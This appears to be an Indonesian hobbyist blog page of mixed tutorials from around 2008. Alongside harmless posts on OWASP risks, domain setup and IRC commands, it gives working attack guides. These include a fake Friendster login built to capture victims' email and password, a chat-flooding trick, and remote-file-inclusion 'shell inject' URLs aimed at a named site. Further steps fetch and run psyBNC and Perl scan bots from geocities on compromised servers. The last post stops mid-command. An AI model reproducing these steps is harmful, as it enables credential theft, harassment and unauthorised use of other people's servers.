lowongan kerja di rumah
Tampilkan postingan dengan label tutorial (indonesian). Tampilkan semua postingan
Tampilkan postingan dengan label tutorial (indonesian). Tampilkan semua postingan
.
.
.
.

Keamanan Web seharusnya merupakan prioritas no.1 yang harus selalu di pertimbangkan oleh seorang web administrator dan web developer, tetapi umumnya para pembuat web akan memprioritaskan bagaimana membuat web yang menarik bagi pengunjung dan menempatkan keamanan web di urutan ke-sekian. Padahal, umumnya aplikasi web adalah penghubung terdepan antara user ataupun attacker, sekaligus sebagai pintu masuk ke seluruh data yang relatif penting milik perusahaan anda.

Para pembuat/penyedia web umumnya mengkategorikan keamanan web sebagai suatu hal yang hanya perlu di pikirkan setelah web itu di buat dan siap di gunakan oleh pengguna. Banyak ahli keamanan web bahkan menyatakan bahwa, umumnya keseluruhan website yang ada di internet rentan untuk di kuasai oleh penyerang, dan celah tersebut umumnya relatif gampang ditemukan bahkan untuk di eksploitasi.

Beberapa Celah itu adalah :

A1 - Cross Site Scripting (XSS)

Celah XSS, adalah saat pengguna web aplikasi dapat memasukkan data dan mengirimkan ke web browser tanpa harus melakukan validasi dan encoding terhadap isi data tersebut, Celah XSS mengakibatkan penyerang dapat menjalankan potongan kode (script) miliknya di browser target, dan memungkinkan untuk mencuri user session milik target, bahkan sampai menciptakan Worm.

A2 - Injection Flaws

Celah Injeksi, umumnya injeksi terhadap SQL (database) dari suatu aplikasi web. Hal ini mungkin terjadi apabila pengguna memasukkan data sebagai bagian dari perintah (query) yang menipu interpreter untuk menjalankan perintah tersebut atau merubah suatu data.

A3 - Malicious File Execution

Celah ini mengakibatkan penyerang dapat secara remote membuat file yang berisi kode dan data untuk di eksekusi, salah satunya adalah Remote file inclusion (RFI).

A4 - Insecure Direct Object Reference

Adalah suatu celah yang terjadi saat pembuat aplikasi web merekspos referensi internal penggunaan objek, seperti file, direktori, database record, dll

A5 - Cross Site Request Forgery (CSRF)

Celah ini akan memaksa browser target yang sudah log-in untuk mengirimkan "pre-authenticated request"terhadap aplikasi web yang diketahui memiliki celah, dan memaksa browser target untuk melakukan hal yang menguntungkan penyerang.

A6 - Information Leakage and Improper Error Handling

Penyerang menggunakan informasi yang didapatkan dari celah yang di akibatkan oleh informasi yang diberikan oleh web aplikasi seperti pesan kesalahan (error) serta konfigurasi yang bisa di lihat.

A7 - Broken Authentication and Session Management

Celah ini merupakan akibat buruknya penanganan proses otentikasi dan manajemen sesi, sehingga penyerang bisa mendapatkan password, atau key yang di gunakan untuk otentikasi.

A8 - Insecure Cryptographic Storage

Aplikasi web umumnya jarang menggunakan fungsi kriptografi untuk melindungi data penting yang dimiliki, atau menggunakan fungsi kriptografi yang di ketahui memiliki kelemahan.

A9 - Insecure Communications

Sedikit sekali aplikasi web yang mengamankan jalur komunikasinya, hal inilah yang dimanfaatkan oleh penyerang sebagai celah untuk mendapatkan informasi berharga.

A10 - Failure to Restrict URL Access

Seringkali, aplikasi web hanya menghilangkan tampilan link (URL) dari pengguna yang tidak berhak, tetapi hal ini dengan sangat mudah dilewati dengan mengakses URL tersebut secara langsung.

Untuk lebih lengkapnya dalam me-review aplikasi web anda, anda dapat membaca langsung dari situs resmi OWASP.



Baca lanjutannya yukss ..
Diposting oleh Admin Label:
.
.
.
.
.
Udah pada banyak yang tau dums Blogspot ama co.cc . Keduanya merupakan layanan Free
Alias GeeraaTeesss.. Ehemm..kalo udah bicara gratis pastinya banyak peminatnya
hehehehe..

Blogspot merupakan layanan blog hosting gratis dari google sedangkan co.cc merupakan
free subdomain gratis yang bagus. Gak kebayang dah, udah bagus gratis lagee..
Kedua layanan gratis ini bisa kita gunakan untuk membuat website yang bagus. Buat gw
sih, kontrol panel di Blogspot itu sangat mudah dipahami. Jadi kalo keduanya
digabungkan pasti akan lebih baik lg.

Okeh sesuai dengan judul diatas, kita akan migrasi-in atau memindah domain dari
Blogspot.com menjadi co.cc. Tapi sebelum melakukan settingan ini, pastiin lu dah
punya blog di blogspot.com, juga account di co.cc.

Bagi yang belon punya acoount di co.cc silahkan klik disini

Sepp mari kita mulai...

* Pada Settingan di co.cc

login ke account lu trus pilih Manage Domain - Set Up



Kemudian pilih Zone Record

Selanjutnya.. contohnya spt ini...

Host:www.wisnoee.co.cc
TTL:1 D
Type/Priority:CNAME
Value:ghs.google.com

sehingga akan seperti ini...



Trus klik Set Up


* pada settingan blogspot nya

Login ke blogger/blogspot kemudian masuk ke menu "Setting-->Publishing"

Kemudian pilih "Switch to: • Custom Domain"

Setelah itu klik pada "Already own a domain? Switch to advanced settings"

Kemudian isikan nama domain kamu yang baru pada kolom "Your Domain".

Jadi nya kek gini...



Trus klik Save Setting.


SElesaIiiii .. !!

Kalau berhasil (Settingnya emg bener) maka domain lu yang baru akan aktif dalam
waktu antara beberapa jam sampai 2 hari.. hehehe... sabar yahhh...
Tapi tenang blog lu masih bisa diakses melalui domain yang lama kowq.

Okehhh.. SElaMat MencObAAa ... !!




Baca lanjutannya yukss ..
Diposting oleh Admin Label:
.
.
.
.
Haduh mau tidur dah tanggung nih.. udah jam setengah lima subuh.
kalo tidur ntar kebablasan ampe pagi lagi. Dah gitu jadi males buat
bersih2 . Jadi mendingan posting aja yang masih ( mungkin )
menurut lu gak penting ini ...

Tapi perlu diinget, ini cuman buat mereka yg berkepentingan aja !
buat lu yg udah hebat gitu.. anggep aja tulisan ini sampah.. ok !

Punya FD ? pernah punya flasdisk ? pernah punya ato nyimpen file
di FD ? pernah punya ato nyimpen file di FD trus kehapus ?
pernah punya ato nyimpen file di FD trus kehapus, trus pengen di
balikin lg ?

Jangan kebakaran jenggot dulu kalo gitu...
ketikan lu, scripsi lu, poto lu, ato pun pelem bokep lu sekalipun
bisa dibalikin lagi ..

Dan yg perlu lu lakuin adalah download softwere dibawah ini ...
jangan lupa instal dulu yaa
Perkara cara makenya gmana .. ya itu adalah urusan lu selanjutnya..
yang jelas gw dah pernah coba make FD user gw yang gw obrak abrik
isinya.. dan alhamdullilah bisa dibalikin lg

gw lagi gak mut buat jelasin lebih rinci cara make nya..
kalo lu mau bawain gw bantal + nasi goreng boleh lah..
Coz sekarang gw lagi ngantuk plus laper berat nih...

Sebenernya bukan cuma di FD aja sih... file2 di kompi lu juga
bisa dibalikin lagi .. hehehehe..

dah ah gw dah ngantukk !! buruan sana download disini !!


Semoga Berhasillllllll !!




Baca lanjutannya yukss ..
Diposting oleh Admin Label:
.
.
.
.
Udah seminggu lebih gak pernah posting nih...bukan apa2, kemaren mud gw agak
sedikit keganggu.. jadi males banged mau posting... selain itu juga gak ada ide
sihh

Ok. kali ini gw mau share dikit yang mungkin menurut lu gak seberapa penting ini.

Pernah punya masalah dengan PDF ? kegangu kenyamanan lu cuma karena
password protection ?? ne dia cara mengatasinya... lu download softwerenya..
trus tinggal remove dah tu password... beress !!! hehhhee

gampang kowq tinggal download kemudian install... cara pake nya gmana ?
nah itu dia masalah lu... silahkan dicoba sendiri ya.. kan udah gw bilang tadi gampang ...
bahkan bisa dibilang gampang banged... !! soo.. silahkan coba !!

Download disini



Baca lanjutannya yukss ..
Diposting oleh Admin Label:

.
.
.
.
Fungsi dari fake login friendster itu untuk menjebak para friendster mania agar lu (yang membuat fake login) bisa mengetahui e-mail dan juga password korban.


buka http://www.friendster.com/login.php trus lu liat source kodenya, trus copy paste code itu ke notepad. nah abis itu lu cari bagian kode dibawah ini :

<div class="flo2">
<div class="lc"><div class="commonbox"><div id="signIn" class="commonbox sn_greenbor">
<div class="signup"><a href="/join.php?next=%2F">Sign Up Now!</a></div>
<div class="login">Please sign in to continue</div>
<div class="boxcontent"><form name="login_form" method="post" action="/login.php">
<input type="hidden" name="_submitted" value="1"><input type="hidden" name="next" value="/">
<input type="hidden" name="tzoffset" value=""><script language="JavaScript">
var now = new Date();
document.login_form.tzoffset.value = now.getTimezoneOffset();
</script><table cellpadding="3" cellspacing="0" border="0">
<tr><td colspan="2"><tr>
<td class="login-box-left" valign="top"><div style="padding-right: 5px; padding-top: 5px;"
class
="tdright"><img src="http://images.friendster.com/images/global/icon-alert-transparent.gif">
</div></td>
<td class="login-box-right" colspan="2"><div style="padding-top: 5px; font-weight: bold;"
class
="grey-text">The email address you entered is not a valid Friendster login.</div></td>
</tr></td></tr>
<tr>
<td style="text-align:right !important;"><strong>Email: </strong></td>
<td><input type="text" name="email" maxlength="100" size="22" alt="Email Address" tabindex="1"
style="width: 200px !important;" value=""></td>
</tr>
<tr>
<td style="text-align:right !important;"><strong>Password: </strong></td>
<td><input type="password" name="password" maxlength="10" size="22" alt="Password"
tabindex="2" style="width: 200px !important;"></td>
</tr>





ganti sama code dibawah ini :




<div class="flo2">
<div class="lc"><div class="commonbox"><div id="signIn" class="commonbox sn_greenbor">
<h2 class="sn sn_dkblue">Please sign in to continue</h2>
<form name="message_form" action="http://www.friendster.com/sendmessage.php" method="post"
onsubmit="this.onsubmit = new Function('return false');">
<input type="hidden" name="_submitted" value="1">
<input type="hidden" name="msg_type" value="">
<input type="hidden" name="uid" value="864567">
<input type="hidden" name="form_id" value="">
<script language="JavaScript">
var now = new Date();
document.login_form.tzoffset.value = now.getTimezoneOffset();
</script><table cellpadding="3" cellspacing="0" border="0">
<tr><td colspan="2"><tr>
<td class="login-box-left" valign="top"><div style="padding-right: 5px; padding-top: 5px;"
class="tdright"><img src="http://images.friendster.com/images/global/icon-alert-transparent.gif">
</div></td>
<td class="login-box-right" colspan="2"><div style="padding-top: 5px; font-weight: bold;"
class="grey-text">The email address you entered is not a valid Friendster login.</div></td>
</tr></td></tr>
<tr>
<td
style="text-align:right !important;"><strong>Email:

</strong></td><td><input type="text"
name="subject" type="text" id="subject" maxlength="100" size="22"
tabindex="1" style="width: 200px !important;" value=""></td>
</tr>
<tr>
<td style="text-align:right !important;"><strong>Password: </strong></td>
<td><input type="password" name="message" type="password" id="message" maxlength="10"
size="22" tabindex="2" style="width: 200px !important;"></td>
</tr>



kenapa harus diganti, baca sendiri kodenya, nah lu analisa sendiri hehehehe...
trus ganti nomor yg gw tebelin + garis basah sama ID FS lu. buat liat
ID fs loe, liat source kode profil fs loe, cari bagian
pageViewerID(jadi itu no ID loe).

Nah trus semua file yg "/*.php" tambahin
http://www.friendster.com" . contohnya : "/forgotpassword.php" jadi
http://www.friendster.com/forgotpassword.php". setelah itu buka web
http://www.markyctrigger.com/OGstandard.html. masukin kode yg td udah di
edit td truz masukin ke kotak atas kemudian klik Generate. Knapa musti di
generate? klo ngga di Generate, Friendster akan mendeteksi
script berbahaya dan bakalan nge-rewrite lagi. Jadi percuma script kita
pasti ga jalan.



lanjuttt , selanjutnya dalah buka FS lu truz ke edit profile, lalu ke Customize. ada di bagian bawah
kotak yg namanya "add media"..
copy paste kode yg udah di Generate td ke bagian ini. Save Dech..



saat si korban melihat profile friendster kita yang telah ditanam
dengan fake login yang telah kita buat, Profile friendster kita
otomatis akan berubah tampilan menjadi tampilan login. Dan si saat
korban memasukkan e-mail dan passwordnya ke fake login yang kita buat
dan menekan enter, si korban sama saja dengan mengirim sebuah message
ke friendster kita berupa e-mail dan password friendsternya. Setelah
kita tahu e-mail dan password si korban, terserah lu selanjut nya mau diapaain...



Tapi ada beberapa kelemahan dari fake login ini.
Mau tau kelemahannya ?? silahkan dicoba sendiri...
Mana bisa tau kali ga di coba sendiri..ya gak ..

Baca lanjutannya yukss ..
Diposting oleh Admin Label:
Jumat, 06 Juni 2008 di 20.20 | 4 komentar  
.
.
.
.
Hmmm...kali ini gw mau kasih tau cara yang simple untuk melakukan flood kepada temen loe. kalo lagi betmut ama seseorang, langsung ajah flood ( lha malah ngajarin yg ga bener nih ) hehehehe

Kelemahannya adalah ID loe bakal jelas terlihat sebagai pengirim flood ini .Karena lu ngelakuinnya tepat saat lu chat dengan lawan chat lu. Tapi jangan coba2 flood org yg mengenal seluk beluk YM . Akibatnya adalah dia akan nyerang balik dengan berbagai cara, karena dia sudah merasa tertantang .Dan kalo itu terjadi, siap2 aja kompi lu yg ngehenggg !!

Flood ini sebenernya teknik lama. Di YM 8 sudah sedikit yang menghasilkan reaksi, dan gw belum lihat reaksi pada YM 9. Namun jika korban adalah pengguna YM 7 atau ke bawah, dijamin bakalan Hang tuh YM.

Caranya simple, ketika lu chat dengan lawan chatting lu dan saat itu lu kepengen melakukan flooding kepada lawan chat tersebut, cukup tekan dan tahan Ctrl+Shift+R cukup lama, kalo bisa sehh seharian dahh

GAmpang bener kannn !!! hehehehhee

Itu adalah shortcut untuk meminta contact details dari sang lawan chatting. dan ketika lu menahan kombinasi tombol tersebut, YM akan meminta berulang-ulang kali.

namun bagaimana buat lu yang pengguna YM 7 jika dihadapkan dengan hal ini? Mudah ! cukup tahan dan tekan Ctrl+Shift+C untuk menjawab request contact details tersebut.

Selanjutnya bagaimana kita bisa tahu korban pengguna YM 7 ke bawah atau bukan? lihat aja saat chat, akan ada pemberitahuan bahwa lawan chat lu itu menggunakan versi yang lebih lawas alias versi di jaman batu. Namun itu tidak menjamin bahwa YM yang digunakannya adalah YM 7. Cara yang paling epektip dan epesien adalah menanyakannya ...

Lu : ehhh...kamu pake YM Versi berapa sehhh ??!
Lawan chating lu : Napainnn lu nanyaakk2... pasti lu mau flood gw yahh...!!

( jahhh ketauaannn dehhhh ... )



Cara berikut nya adalah : langsung aja datengin lawan chating lu, face to face. Dan tanyain aja langsung.
Nah kalo dah gitu maka ga perlu lg flood. Ambil aja golok, bertarung lah disana ... hehehehhe..



Semoga bermanfaat !!



Baca lanjutannya yukss ..
Diposting oleh Admin Label:
.
.
.
.
Pertama gw kenal script di IRC itu dikasih tau ama MUSANK A.K.A Nicky.
Waktu itu kalo gak salah dia ngasih scripts Drunken Master yg punya Revenge 3 kali. Beberapa waktu kemudian gw coba cari di om Goggle. Waaww..ternyata ada banyak bermacam2 scripts !!
Puas dengan Drunken Master gw coba Boss, Allstar, De-el-el. Dulu sih masih cupu2 nya make script. Jadi jangan heran kalo chanel2 dimana gw ada ACC didalem nya, sering Warning ke gw .

* Noeee Patiin gak Script loe !!
* Remote Off plisss !!
* Lu off scripts apa di del ACC ?!! tinggal pilih !!
* chanserv sets mode: +b *!*@sukanya.membobol.perawan.cewek-smu.info*
wisnoee was kicked by ChanServ (User has been banned from the channel)

Wahh2.. kejam sekali .. itu cuma beberapa dari sekian banyak Peringatan yg saya terima. hehehehehe ... tapi ya mau gmana, namanya juga baru belajar masuk mata kanan keluar mata kiri dahhh

Ohhh.. iya sampe lupa ..
Sejak gw di ajakin war ama anak2 chanel, gw mulai ngotak atik scripts. dan walhasil ini dia scripts yg dulu pernah lolos dalem editing gw. ( mohon buat master2 scripts, acuhkan aja tulisan ini )

Makenya gampang kowq tinggal kopi paste di remote, teruuss klik Ok. Selesai !!



#ban on

on @!*:ban:#: {
if ($banmask iswm $address($me,5)) {
chanserv unban #
timer 1 2 kick # $nick 8,1[9,1w1,9i9,1s1,9n9,1o1,9e9,1e8]
timer 1 2 ban $chan $nick
guser prey $nick 5
inc %kick
}
}

on *:KICK:#:{
if ($knick == $me) {
cs invite $chan
.timer 1 1 join $chan
.timer 1 1 cs deop # $nick
.timer 1 1 kick # $nick 4« 4» 4« $+ %kick $+ 4» 4« 8,1[9,1w1,9i9,1s1,9n9,1o1,9e9,1e8]»
guser prey $nick 5
inc %kick
}
}
on prey:JOIN:#:{
if ($me isop $chan) { kick $chan $nick 4« 4» 4« $+ %kick $+ 4» 4« 8,1[9,1w1,9i9,1s1,9n9,1o1,9e9,1e8]» | inc %kick | halt }
else { halt }
}

#deop on
on *:DEOP:#: {
if ($opnick !== $me) halt << if you are deoped
cs op $chan $me
timer 1 2 kick $chan $nick 8,1[9,1w1,9i9,1s1,9n9,1o1,9e9,1e8]
timer 1 2 ban $chan $nick
guser prey $nick 5
}
}

#deop end


Mohon maaf kalo ada kekurangan disana sini ... cuma scripts biasa, just for fun. kreativitas loe sangat diandalkan disini... sooo.. Selamat mencoba !!!
Baca lanjutannya yukss ..
Diposting oleh Admin Label:
.
.
.
.
Buat loe2 yang baru belajar MIRC ( ceeileee..sok bener gw ini yakk ) . Neh gw kasih sedikit yg gw punya.

Ini adalah Perintah / command dasar di DAL.NET, mudah2an ada manfaatnya

/nick (nick baru) = mengganti nickname loe
/notice (nick) (pesan) = notice ke nick
/join (#channel) = masuk chennel
/say (pesan) = seperti chat biasa
/part (#channel) = keluar dari channel
/msg (nick) (pesan) = kirim msg ke nick
/quit = keluar dari IRC
/notify (nick) = agar tau nick tersebut online / tidak
/notify - (nick) = menghilangkan (nick) dari notify list
/quit (pesan) = quit dengan pesan loe
/server (nama server) = ganti server
/query (nick) = private msg ke user
/invite (nick) (#channel) = invite user
/dcc chat (nick) = dcc chat ke nick
/dcc send (nick) (filename) = kirim file
/mode (nick kamu) +I = ubah mode menjadi invisible (tidak kelihatan di /who #channel oleh orang)
/ignore (nick) atau /ignore *@IPnya = abaikan user, semua tulisannya tidak akan loe lihat
/me (pesan) = action, hasilnya *(nick) (pesan)
untuk diminculkan ke semua channel yang kita OL
/list = melihat list semua chennel
/who (nick/#channel) = melihat keterangan user atau channel
/whois (nick) = melihat keterangan ttg user
/away (pesan) = pergi sesaat dengan pesan
/away = menyatakan balik dari away
/ctcp (nick) ping = periksa berapa lama ketikan loe sampai ke user
/ctcp (nick kamu) ping = cek lag kamu sendiri
/uwho (nick) = melihat U central nick
/clear = bersihkan layar aktif


Yang ini Perintah Standar Untuk Operator Channel

/kick (#channel) (nick) = kick user
/topic (#channel) (topiknya) = mengganti topik channel
/kick (nick) (#channel) (alasan) = kick user dengan alasan
/mode (#channel) +b *!*@IPnya = Band IP user
/mode (#channel) +b nick! username@host.add.ress = Ban user misal /mode #lampunk -b *!*@125.126.252.21
/mode (#channel) –b *!*@IPnya = buka Ban user, missal /mode #lampunk -b *!*@125.162.252.21
/mode (#channel) +o (nick) = memberikan Op pada user
/mode (#channel) +v (nick) = memberikan voice pada user
/mode (#channel) – o (nick) = menurunkan user agar tidak Op lagi
/mode (#channel) –v (nick) = mengambil voice user
/mode (#channel) +/- ntispklRrmc = set mode channel
/channel = melihat mode dan ban list channel

/mode #ch +vvv n1 n2 n3 = memberi voice ke byk orang
/chanserv sop #ch add nick = memberi SOP

Yang ini Perintah ChanServ Dalnet

ket: (A) = semua, (AOP) = minimal aop, (SOP) = minimal sop, (F) = founder

/chanserv info (#channel) = melihat info channel (A)
/chanserv invite (#channel) (nick) = minta chanserv untuk invite (A)
/chanserv unban (#channel) (nick loe) = Unban diri loe (AOP)
/chanserv unban (#channel) * = unban semuanya (AOP)
/chanserv register (#channel) (passwd) (desikripsi) = register channel baru (F)
/chanserv identify (#channel) (passwd) = identify channel (F)
/chanserv drop (#channel) = drop channel (F)
/chanserv set (#channel) passwd (pass baru) = ganti password channel (F)
/chanserv set (#channel) founder = set sbg founder baru (F)
/chanserv set (#channel) desc (deskripsinya) = set deskripsi channel (F)
/chanserv set (#channel) topic (topiknya) = set topik channel (F)
/chanserv set (#channel) url (alamat url-nya) = set webpage channel (F)
/chanserv set (#channel) mlock (tulis modenya) = set kunci mode channel mis. +nt-ispklR (F)
/chanserv set (#channel) ident (on/off) = set ident aktif/tidak (F)
/chanserv set (#channel) restrict (on/off) = set restrict channel (F)
/chanserv set (#channel) keeptopic (on/off) = set keep topik channel (F)
/chanserv set (#channel) topiclock (sop/founder/off) = set topiklock channel (F)
/chanserv set (#channel) opguard (on/off) = set opguard
/chanserv set (#channel) memo (none/aop/sop/founder) = set memo level channel (F)
/chanserv why (#channel) (nick) = melihat akses yang dipakai nick untuk jadi op (AOP)
/chanserv op (#channel) (nick) = mengangkat menjadi op (AOP)
/chanserv deop (#channel) (nick) = menurunkan dari op (AOP)
/chanserv (aop/sop/akick) (#channel) list = melihat daftar aop, sop, atau akick
/chanserv aop (#channel) add (nick) = jadikan aop (SOP)
/chanserv sop (#channel) add (nick) = jadikan sop (F)
/chanserv aop (#channel) del (no. list aop) = hapus aop (SOP)
/chanserv sop (#channel) del (no. list sop) = hapus sop (F)
/chanserv (aop/sop/akick) (#channel) (add/del) nick!username@host.add.ress = masukkan/hapus dari list (SOP)
/chanserv mdeop (#channel) = mass deop channel, tapi aop tdk bisa deop sop dan founder (AOP)
/chanserv mkick (#channel) = mass kick channel (SOP)

Kalo yang ini Perintah NickServ Dalnet

/nickserv register (password) (email) = register nick
/nickserv ghost (nick) (passwd) = kill ghost yaitu bila nick dipakai orang atau tertinggal di channel
/nickserv identify (password) = identify nick
/nickserv set kill (on/off) = set kill nick
/nickserv recover (nick) (passwd) = recover nick
/nickserv release (nick) = release nick
/nickserv drop (nick) = drop nick
/nickserv set passwd (passwd baru) = ganti password nick
/nickserv set noop (on/off) = set no op untuk nick
/nickserv set nomemo (on/off) = set no memo untuk nick
/nickserv info (nick) = mengetahui informasi tentang nick

Yang ini Perintah MemoServ Dalnet

/memoserv list = melihat daftar memo yg loe punya
/memoserv send (nick) (pesan) = kirim memo
/memoserv send (#channel) (pesan) = kirim memo ke op
/memoserv read (no. list memo) = baca memo yang ke berapa (sesuai list memo)
/memoserv del (no. list memo) = hapus memo no di list
/memoserv undel (no. list memo) = undel memo

Nah ini dia "salah duapuluh satu" server2 DALnet ( jgn taunya cuma makenya aja )

Untuk connect / ganti server, Ketikkan /server (namaServer)
contoh: /server hotspeed.sg.as.dal.net

CA Servers : Canada

/server maple.ix.ca.dal.net

EU Servers : Eropa

/server mozilla.se.eu.dal.net
/server powertech.no.eu.dal.net
/server slimey.uk.eu.dal.net
/server genesis-r.uk.eu.dal.net
/server matrix.de.eu.dal.net
/server arcor.de.eu.dal.net

AS Servers : Asia

/server hotspeed.sg.as.dal.net
/server mesra.kl.my.dal.net

US Servers : Amerika Serikat

/server aeon.nj.us.dal.net
/server broadway.ny.us.dal.net
/server hollywood.ix.us.dal.net
/server jade.va.us.dal.net
/server jingo.ix.us.dal.net
/server loyalty.ix.us.dal.net
/server masters.ix.us.dal.net
/server novel.fl.us.dal.net
/server redemption.ix.us.dal.net
/server rumble.fl.us.dal.net
/server serenity.ix.us.dal.net
/server soho.ix.us.dal.net

Yuppsss... dengan hafal semua command itu, paling ga loe dah punya satu modal buat ngelamar jadi Operator Channel !! hehehehehe

Selamat mencoba !!
Baca lanjutannya yukss ..
Diposting oleh Admin Label:
.
.
.
.
Dohh tanggung nihhh , mau tidurr... sempet2in posting duluu...

Ok..

Kali ini gw akan coba berikan sedikit yg gw tau ttg nge-buat PsyBNC untuk yang FreeBSD. Dan lagi2 dengan injectan tentunya .

caranya hampir sama kek yg buat linux . Dah tau dunkzz !! kalo yg blon tau N mau baca yg buat linux silahkan lihat disini .


Berhubung gw dah ngantuk jadi agak dipercepat aja yaa...



1. buka shell inject kamu , silahkan cari dir yg memberikan permission 777

2. fetch http://www.geocities.com/wisnu_amanda/psyBsd.tgz

3. tar zxfv psyBsd.tgz

4. rm -fr psyBsd.tgz

5. Tambah / masuk change dir /.psy contoh :

/home/muveszet/public_html/spaw/imagesszobor/.psy

6. ./config (PORT) contoh : ./config 2525

7. ./fuck

8. ./run

9. Selesaii !!!

Massih bingung ??!! silahkan pelajari detail nya , yang bisa kamu lihat disini


Silahkan konekin ke irc ...



Selamat "Nambah Dosa" ... !!


Saya hanya mencoba memberikan apa yg telah saya
pelajari, lakukan, buktikan. tidak ada niat untuk menggurui. saya buat yg
semudah2 nya agar teman2 yg baru belajar tidak kesulitan memahaminya.

selamat mencoba, you can do it !
Baca lanjutannya yukss ..
Diposting oleh Admin Label:
.
.
.
.
Kali ini saya ( dohhh..formal bangedd seeechh.. !! ) ..

Kali ini gw akan coba berikan sedikit yg gw tau ttg nge-buat bot yang untuk FreeBSD. Dan masih tetep dengan inject-an tentunya .

Berhubung gw dah ngantuk jadi agak dipercepat aja yaa...

caranya hampir sama kek yg buat linux . Dah tau dunkzz !! kalo yg blon tau N mau baca yg buat linux silahkan lihat disini .

langsung aja yaa.. dah mau adzan subuh nihh...

1. fetch http://www.geocities.com/wisnu_amanda/botBsd.tgz ketik kedalam command
execute, kemudian klik execute

2. tar zxfv botBsd.tgz ketik kedalam command execute, kemudian klik execute

3. rm -fr botBsd.tgz ketik kedalam command execute, kemudian klik execute

4.

a. Tambahin change directory dengan : /.sh contoh :
/home/muveszet/public_html/spaw/imagesszobor/.sh

b. ./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner) contoh :

./nadya a.txt bangkee noe 193.224.55.172 lampunk wisnoee ketik kedalam command
execute, kemudian klik execute

5. ./dssl a.txt ketik kedalam command execute, kemudian klik execute

6. Selesai ! . Silahkan tunggu bot kamu join

Cara nya hampir sama kowq dengan buat bot buat di linux ... kalo mo tau lebih detill nya lihat disini

Selamat Mencobaaa !!!


Saya hanya mencoba memberikan apa yg telah saya
pelajari, lakukan, buktikan. tidak ada niat untuk menggurui. saya buat yg
semudah2 nya agar teman2 yg baru belajar tidak kesulitan memahaminya.

selamat mencoba, you can do it !

Baca lanjutannya yukss ..
Diposting oleh Admin Label:
.
.
.
.
Gmana prendd ??

Masih berminat menambah dosa ?? halahhh... tampang lo aja sok polosss...

padahal mah dalem nya ... liarrrrRRrrr !! hehehehe...

dan sampe sekarang gw tau kalo buat beli shell lo masih ga punya duitt kannn...

Respon : jahh , males2in amat gw beli nuu, mendingan gw scan, nyari injectann..
hareee geneee belii shell...ga buangeedddd...mending gw pake duit nya buat sewa PSK

Answer : yahh itu seh terserah lu, mau beli PSK kek, PKS kek...tapi saran gw satu... mendingan cari kambing kalo cuma mau cari lobang mahhhh.. ... coz gw kan dah pernah nyobaa... enakk tauu...ada 4 macem rasa...
1. gatel2
2. perih
3. muntah2
4. ( ini yg paling utama ) ketar - ketir takut ketauan yg punya


aduhhh... kowq jadi ngelantur yaa... langsung aja deh kali ini topic kita adalah buat bot scan / perl.

nah buat lo2 yg suka scan gituu.. mudah2an bisa buat botscan sendiri...

1. Buka shell kamu. contoh :
http://wots-on.info/mail/bxad/functions/update.php?functions_dir=
http://www.geocities.com/wisnu_amanda/wisnu.txt???

2. lihat Permission Directory = no atau yes ( jika Permission Directory = no , maka kita harus
mencari Directory yang memberikan permission 777 / yang tidak Permission Denied dengan command find / -type d -perm 777 , dan jika Permission Directory = yes , maka langsung ikuti langkah ke-4 )

contoh setelah find / -type d -perm 777 , maka akan muncul spt ini contoh :

find: /home/baksai/.spamassassin: Permission denied
find: /home/galne: Permission denied
find: /home/giorgio/mail: Permission denied
find: /home/giorgio/.openwebmail: Permission denied
/home/muveszet/public_html
/home/muveszet/public_html/spaw/images
/home/muveszet/public_html/spaw/imagesszobor

3. Pilih salah satu yang tidak Permission Denied. Kita ambil contoh :

/home/muveszet/public_html/spaw/imagesszobor, Kemudian Masukan

/home/muveszet/public_html/spaw/imagesszobor ke change directory

4. trus masukin dagh source bot nya ke dalem shell kamu ....

kamu download aja source nya... trus upload lg kedalem shell kamu.. ngerti kann... ?? weitt..tapi jangan lupa diedit dulu source nya..biar ga nyasar ke cenel laen. pokoknya kamu edit yg perlu diedit dahh...

Ngerti kannn.. hehehehhe...

kalo ga ngerti bunuh diri aja lahh...!!

4. Selesai upload trus kamu ketik : perl namafile.txt di command execute trus kli execute

5. silahkan tunggu bot kamu join di cenel

OIYAAaaa... ga semua target mendukung perl ..so.. yang sabar yaa nyari nyaa...

Neh dibawah ini gw kasih beberapa source yang pernah gw punya waktu muda duluu..


neh dia source nya ...

wisnu1.txt
wisnu2.txt
wisnu3.txt
scan5.txt
scan6.txt
scan7.txt
perledit.txt
mineedit.txt
kitaedit.txt
acro.txt
anakmakassar.txt
buatbotscan.txt
kambe.txt
mailer.txt
newbotedit3.txt
newbotedit2.txt
newbot.txt
ixanedit.txt
ixan.txt



Sampai ketemu di Neraka ... !!!


Saya hanya mencoba memberikan apa yg telah saya
pelajari, lakukan, buktikan. tidak ada niat untuk menggurui. saya buat yg
semudah2 nya agar teman2 yg baru belajar tidak kesulitan memahaminya.

selamat mencoba, you can do it !!
Baca lanjutannya yukss ..
Diposting oleh Admin Label:
.
.
.
.
sebelumnya sedikit ttg psyBNC...

psyBNC merupakan salah satu software yang dapat anda gunakan untuk bisa memakai Ip shell yang anda punya untuk keperluan IRC dan merupakan pengembangan dari BNC. Dengan menggunakan psyBNC kamu akan dapat ter-
lindungi dari Winukes dan flood, dan juga nick kamu bisa online 24 jam.

yups...sekarang mari belajar membuat psyBNC dari shell inject tentunya... kenapa make shell inject ?? ...hmm... saya tau kalo yg account pasti kamu ga ada duitttt..ya kann...

1. Buka shell kamu. contoh :
http://wots-on.info/mail/bxad/functions/update.php?functions_dir=
http://www.geocities.com/wisnu_amanda/wisnu.txt???

2. lihat Permission Directory = no atau yes ( jika Permission Directory = no , maka kita harus
mencari Directory yang memberikan permission 777 / yang tidak Permission Denied dengan command find / -type d -perm 777 , dan jika Permission Directory = yes , maka langsung ikuti langkah ke-4 )

contoh setelah find / -type d -perm 777 , maka akan muncul spt ini contoh :

find: /home/baksai/.spamassassin: Permission denied
find: /home/galne: Permission denied
find: /home/giorgio/mail: Permission denied
find: /home/giorgio/.openwebmail: Permission denied
/home/muveszet/public_html
/home/muveszet/public_html/spaw/images
/home/muveszet/public_html/spaw/imagesszobor

3. Pilih salah satu yang tidak Permission Denied. Kita ambil contoh :

/home/muveszet/public_html/spaw/imagesszobor, Kemudian Masukan

/home/muveszet/public_html/spaw/imagesszobor ke change directory

4. wget
